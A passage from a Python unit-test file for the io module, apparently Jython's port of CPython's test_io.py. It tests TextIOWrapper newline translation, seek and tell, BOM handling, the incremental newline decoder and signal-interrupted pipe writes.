]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super(MyTextIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyTextIO, self).close()
def flush(self):
record.append(3)
super(MyTextIO, self).flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin1", "utf8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
f = self.open(support.TESTFN, "wb")
f.write(line*2)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
s = f.read(prefix_size)
self.assertEqual(s, prefix.decode("ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
f = self.open(support.TESTFN, "wb")
f.write(data)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
# Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@unittest.skipUnless(threading, 'Threading required for this test.')
@unittest.skipIf(support.is_jython, "Not thread-safe: Jython issue 2588.")
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=lambda n=x: run(n))
for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02)
event.set()
for t in threads:
t.join()
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
def bad_flush():
raise IOError()
txt.flush = bad_flush
self.assertRaises(IOError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises((AttributeError, TypeError)):
txt.buffer = buf
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
class NonbytesStream(self.StringIO):
read1 = self.StringIO.read
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.read(1)
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.readline()
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
# Jython difference: also detect the error in read()
t.read()
def test_illegal_decoder(self):
# Issue #17106
# Crash when decoder returns non-string
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read(1)
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.readline()
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read()
class CTextIOWrapperTest(TextIOWrapperTest):
def test_initialization(self):
# Use ascii material so decoding does not raise ValueError
r = self.BytesIO(b"red\nherring\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
# Jython note: Invalid __init__ calls also leave t unreadable (in C
# implementation but not pure python _pyio).
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read) # Check t unreadable
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read) # Check t unreadable
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
maybeRaises = unittest.TestCase.assertRaises
class PyTextIOWrapperTest(TextIOWrapperTest):
@contextlib.contextmanager
def maybeRaises(self, *args, **kwds):
yield
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(b))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertTrue(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
g.close() # Jython difference: close g first (which may flush) ...
f.close() # Jython difference: then close f, which closes the fd
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_blockingioerror(self):
# Various BlockingIOError issues
self.assertRaises(TypeError, self.BlockingIOError)
self.assertRaises(TypeError, self.BlockingIOError, 1)
self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
b = self.BlockingIOError(1, "")
self.assertEqual(b.characters_written, 0)
class C(unicode):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertTrue(sent == received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
class CMiscIOTest(MiscIOTest):
io = io
class PyMiscIOTest(MiscIOTest):
io = pyio
# Jython does not use integer file descriptors but an object instead.
# Unfortunately, _pyio.open checks that it is an int.
# Override the affected test version just so we can skip it visibly.
@unittest.skipIf(support.is_jython, "Jython does not use integer file descriptors")
def test_attributes(self):
pass
@unittest.skipIf(support.is_jython, "Jython does not support os.pipe()")
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1 // 0
@unittest.skipUnless(threading, 'Threading required for this test.')
@unittest.skipIf(sys.platform in ('freebsd5', 'freebsd6', 'freebsd7'),
'issue #12429: skip test on FreeBSD <= 7')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
signal.alarm(1)
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
self.assertRaises(ZeroDivisionError,
wio.write, item * (1024 * 1024))
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1//0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
